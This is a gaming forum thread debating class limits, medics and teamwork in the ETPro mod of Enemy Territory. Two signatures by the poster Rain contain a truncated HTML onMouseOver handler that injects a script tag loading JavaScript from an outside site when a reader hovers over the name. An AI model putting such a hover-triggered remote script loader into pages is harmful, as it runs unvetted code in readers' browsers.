Feature requests.

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

jessed75

Post by jessed75 »

Its not my guild that doesnt play nice, its the public players. And I just thought since they are already limiting classes in a way it would be easy to add this. And trust me, the accuracy of the MP40 is better at long range, and the bullets of the Thompson do more damage, I have thoroughly tested this. :wink:

I've heard about this bayonet, it would be great to have a more "public based" mod. But like I said, Im shutting down soon and moving to TCE. Its just too bad it's come to this. Like the other guy said, there just isnt a lot of teamplay out there. I wanna be covert, me me me, nevermind half the team already is. :roll:

In any case, ETPro has been great and I would have quit earlier without it. Thanks for everything Bani. :)
uber-noob

Post by uber-noob »

jessed75 wrote:Its not my guild that doesnt play nice, its the public players. And I just thought since they are already limiting classes in a way it would be easy to add this. And trust me, the accuracy of the MP40 is better at long range, and the bullets of the Thompson do more damage, I have thoroughly tested this. :wink:
Trust me, I am working on the ET source code myself and they are 100% equal. Any difference is just pure imagination. Maybe based on old RTCW experience or the different sounds the guns make, but it's just imagination.
gotenks

Post by gotenks »

uber_noob wrote:
jessed75 wrote:Its not my guild that doesnt play nice, its the public players. And I just thought since they are already limiting classes in a way it would be easy to add this. And trust me, the accuracy of the MP40 is better at long range, and the bullets of the Thompson do more damage, I have thoroughly tested this. :wink:
Trust me, I am working on the ET source code myself and they are 100% equal. Any difference is just pure imagination. Maybe based on old RTCW experience or the different sounds the guns make, but it's just imagination.
i have looked into the source code (was gonna do some modding, but decided to /quit), and has come from bani, rain, splash damage... they are not only similar they use the exact same calculations... they're not just set the same... there is NO difference
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
jinx

Re: Feature requests.

Post by jinx »

People need to stop taking pubbing so seriously.

If you get upset because your team doesn't have an engineer, and as a result quit ET...then there are a couple possible problems:

1) Why aren't you an engineer?
2) It is a pub, it is like going crazy because you lost in a friendly game of Clue.

If you are an engineer and can't get to the objective, than no mod is going to help you because generally in pubs, people don't set up a defense while in warmup :P And if you can't get to the objective through a disorganized defense - you suck and nobody will miss your depature.

As for crying about medics, I've yet to hear a 'good' player complain about medics being too strong. If you can't kill them because they are a medic, it is quite likely you won't kill them if they aren't a medic either...also, what happened to "If you can't beat them, join them!". Nothing is restricting you from owning them up by getting that extra...omg...10-20 HP :o

"Many players are medics just because they die less, they have no desire to help the team."

If you don't die as much, then you are naturally giving the other team more hell...I think that is pretty beneficial to your team.

What has been limited is the spam weapons. The weapons that bridge skill gaps. Rifle nade spam is a lot easier to get kills with than spraying bullets into a room...that is spam and should be limited to allow for any real gameplay.

As a last note: Nothing you brought up is a bug. Basically, what this thread can be chalked up to is-> another poor player wanting to turn other peoples fun into their competition. When good players pub, they aren't playing at your competitive level, and that is when 'these' [the poster] people can shine, or so they think. Let the ETPro team focus on competitive mods and real game bugs.

BTW, if the ETPro team made medics with less HP, you would cry that they can give themselves packs...then if they made it where the medic couldn't pack himself, you would cry that other medics are packing each other...3 minutes later...then you would cry because you have a terrible shot and they don't write scripts in that help you aim by putting the crosshair close to the enemies head because "it isn't fair that the other guy can shoot your head before you can shoot his!"

EDIT: Fixed a brain[word]-to-finger[typed] typo.
Last edited by jinx on Sat May 07, 2005 8:18 pm, edited 1 time in total.
jinx

Post by jinx »

If any of the above applies to you, single player RPG's are for you. ^^
EagleReloaded

Post by EagleReloaded »

:bows: I think it's time for a slow round of applause.
Some people play tennis, I erode the human soul.
Rain

Post by Rain »

jinx wrote:People need to stop taking pubbing so seriously.

If you get upset because your team doesn't have an engineer, and as a result quit ET...then there are a couple possible problems:

I am an engineer. Unfortunately, 1v20 doesn't go very well.
jinx wrote:2) It is a pub, it is like going crazy because you lost in a friendly game of Clue.
All my teammates, with the lead pipe, in the fuel dump garage.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
jinx

Post by jinx »

Rain wrote:Unfortunately, 1v20 doesn't go very well.
You are telling me you are on a pub that lets people join a team that has 19 players and the other team has 1? I doubt this is true, certainly your teammates aren't standing around idle, either...I'm sure they are engaging the enemy. When I watch demos of certain clans that might be running one engineer, I wouldn't consider them in a 6 v 1 match.

However, I know how you feel, but it is the result of a poor pub, not something that is, or even should be, fixed by forcing people to play the way a certain group of people deem necessary for success in the pub arena.

Just for a side note of possible interest: I am a Field-Op that puts ammo distrobution above spamming artillery and air strikes. I used to play medic because I was good with the needle, I kill medics just as easily as I kill engineers/soldiers/fdops/coverts.
Spoofeh

Post by Spoofeh »

jinx wrote: If you get upset because your team doesn't have an engineer, and as a result quit ET...then there are a couple possible problems:

Actual conversation on a pub:
: (player1)(Command Post Garage): We need an engineer!
(player1) (Command Post Garage): for fuck sake team we do not have an engi so we will lose this 1
player1: 2 min left and still no engi fucking team
player2: go eng then player1
(player1) (Command Post Garage): no i got 2 manny xp as a fild ops

:lol:
jinx

Post by jinx »

Not surprising. It seems to be the mentality of many people; they think they are helping their team so much by being the class they are, and, of course, nobody is helping because they aren't winning. As a result, they b&m to everybody and talk trash and blame the rest of their team for not winning the round.

If the pub is serious or I see people trying to win, I will play the class that will best help the team. If it isn't serious, I will rambo around - this is why an end-all cvar that forces something isn't necessarily a good idea, because a given pub doesn't hold the same style players all day. Plus it is a waste of time to impliment :) There are plenty of good suggestions floating around that would improve gameplay more than this could.
>>steven!

Post by >>steven! »

who cares about pubs lol

as if ppl go in there to do the objective, the point in pubs is aim practice and to try out new ffes/arties/riflenadeshots/panzershots and mortars. general pissabout, that is all, and that is fun.
UK Elite Guard
#ukeg on Quakenet
www.ukeliteguard.co.uk
Est. Jan 2002
squadjot

Post by squadjot »

/*Demoman*/ wrote:
[MoB]Seany wrote:maybe etpro needs a mini plugin mod for pubplay :?
or maybe they need to stop being the "mod to end all mods" and just create a competion mod... like etpro was supposed to be

if they want to add nifty pub things like class limitation, shrug, etc move code over to bayonet side and finally begin work on that

how much more needs to be added to etpro to make a pub game balanced for competion? I thought that was the goal... not adding everything that mankind can think of to please every group of whining teenagers
Image amen!!!
Rain

Post by Rain »

jinx wrote:You are telling me you are on a pub that lets people join a team that has 19 players and the other team has 1? I doubt this is true, certainly your teammates aren't standing around idle, either...I'm sure they are engaging the enemy.
Nineteen people who are not playing as a team in even the most basic sense are often as good zero people. There have been cases where I've felt I'd be better off if the teams were literally 20v1.

As an aside, one of the best games I've ever played was 2v12ish (with myself being 1 of the 2) in RtCW on mp_beach. We eventually lost, but we (a medic and a lieutenant) put up a hell of a fight--we made it a good 20 minutes. I wish I saw teamwork like that in ET.

At any rate, all that makes this:
jinx wrote:When I watch demos of certain clans that might be running one engineer, I wouldn't consider them in a 6 v 1 match.
rather moot. But then, I think you knew what I was talking about, and I wasn't really speaking in the context of the rest of the thread, so whatever.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
EagleReloaded

Post by EagleReloaded »

Limiting classes isn't going to do squat to change pub mentality. I too can remember "good old days" where you'd hold the bank for 20 minutes on Gold Rush with an MG, a few field ops and meds and the entire room covered in a carpet of packs, but just because it was good then doesn't mean I'd want to do it now. Just because people are forced to a certain class doesn't mean they're going to use it constructively. You can go covert ops without helping your team, you can have 18 engineers on your team without any of them bothering with objectives, they'll just landmine camp and nade spam and whatever else they feel like. Just because there are 2 medics doesn't mean there's any extra pressure on those medics to save the team if they're only concerned with going rambo. If leagues start dictating you can only use 2 medics at any given time, well then so be it, that's up to them, but from a pub point of view, nothing will change, so why bother?
Some people play tennis, I erode the human soul.
Kendle

Post by Kendle »

For comps I'm against, and always have been, limiting Classes, as that limits tactical choice. If a team wants to run with 6 Coverts that's their choice, if they're really that stupid. Unfortunately choice isn't as free as many would believe, Med isn't the defacto fighting Class in ET cos people like the uniform :wink:

On pubs I think you can take 2 points of view, depending on whether you're clanned or not. For the first 6 months after ET was released I was a pub player only. I was clanned but inactive with the rest of my clan still playing RTCW. I cared very much about doing the objective and got plenty stressed when others seemed not to care, and of course the XP-whore soon became the plague of ET servers. At the time I'd have taken great offence to the notion that pubs were for fun only so I can see where people are coming from with these kind of arguments. Nowadays I pub maybe 10% of my time max, so don't particularly care either way, though I do tend to avoid servers like BiO which don't make any pretence of being anything other than Med wars these days (perhaps it really is the uniform rather than the extra health / regen / packs). :D